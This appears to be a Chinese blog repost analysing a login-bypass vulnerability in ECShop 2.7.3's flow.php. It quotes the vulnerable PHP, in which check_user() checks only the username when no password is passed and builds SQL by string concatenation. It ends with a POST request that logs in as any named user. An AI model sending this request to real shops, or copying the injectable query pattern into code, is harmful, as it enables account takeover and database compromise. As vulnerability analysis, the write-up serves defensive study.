php3绕过,ecshop 2.7.3 /flow.php 登录绕过漏洞

最新推荐文章于 2023-04-09 18:50:35 发布

weixin_39995351

最新推荐文章于 2023-04-09 18:50:35 发布

阅读量315

点赞数

文章标签： php3绕过

影响文件:flow.php 188行开始

elseif ($_REQUEST['step'] == 'login')

{

include_once('languages/'. $_CFG['lang']. '/user.php');

/*

* 用户登录注册

*/

if ($_SERVER['REQUEST_METHOD'] == 'GET')

.....

else

{

include_once('includes/lib_passport.php');

if (!empty($_POST['act']) && $_POST['act'] == 'signin')

{

$captcha = intval($_CFG['captcha']);

if (($captcha & CAPTCHA_LOGIN) && (!($captcha & CAPTCHA_LOGIN_FAIL) || (($captcha & CAPTCHA_LOGIN_FAIL) && $_ SESSION['login_fail'] > 2)) && gd_version() > 0)

{

if (empty($_POST['captcha']))

{

show_message($_LANG['invalid_captcha']);

}

/* 检查验证码 */

include_once('includes/cls_captcha.php');

$validator = new captcha();

$validator->session_word = 'captcha_login';

if (!$validator->check_word($_POST['captcha']))

{

show_message($_LANG['invalid_captcha']);

}

}

if ($user->login($_POST['username'], $_POST['password'],isset($_POST['remember'])))

{

.....

}

上面代码中执行了登录操作 $user>login($_POST['username'], $_POST['password'],isset($_POST['remember'])

login方法如下：

function login($username, $password, $remember = null)

{

if ($this->check_user($username, $password) > 0)

{

if ($this->need_sync)

{

$this->sync($username,$password);

}

$this->set_session($username);

$this->set_cookie($username, $remember);

return true;

}

else

{

return false;

}

}

function check_user($username, $password = null)

{

$post_username = $username;

/* 如果没有定义密码则只检查用户名 */

if ($password === null)

{

$sql = "SELECT " . $this->field_id .

" FROM " . $this->table($this->user_table).

" WHERE " . $this->field_name . "='" . $post_username . "'";

return $this->db->getOne($sql);

}

else

{

$sql = "SELECT " . $this->field_id .

" FROM " . $this->table($this->user_table).

" WHERE " . $this->field_name . "='" . $post_username . "' AND " . $this->field_pass . " ='" . $this-> compile_password(array('password'=>$password)) . "'";

return $this->db->getOne($sql);

}

}

登录操作最终执行check_user方法，当用户密码为null时，只判断用户名。而在flow.php中并没有对密码进行判断或者初始化。可以只通过账号就可

以实现登录。

漏洞利用过程

url:.xxx.com/flow.php?step=login

POST:act=signin&username=xxxx&captcha=yyyyy

captcha是验证码，有时候是不需要验证码的

weixin_39995351

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
php3绕过,ecshop 2.7.3 /flow.php 登录绕过漏洞

影响文件:flow.php188行开始elseif ($_REQUEST['step'] == 'login'){include_once('languages/'. $_CFG['lang']. '/user.php');/** 用户登录注册*/if ($_SERVER['REQUEST_METHOD'] == 'GET').....else{include_once('includes/li...
复制链接

扫一扫

评论

被折叠的条评论为什么被折叠?

到【灌水乐园】发言

查看更多评论

添加红包

成就一亿技术人!

hope_wisdom

发出的红包

实付元

使用余额支付

点击重新获取

扫码支付

钱包余额 0

抵扣说明：

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、付费专栏及课程。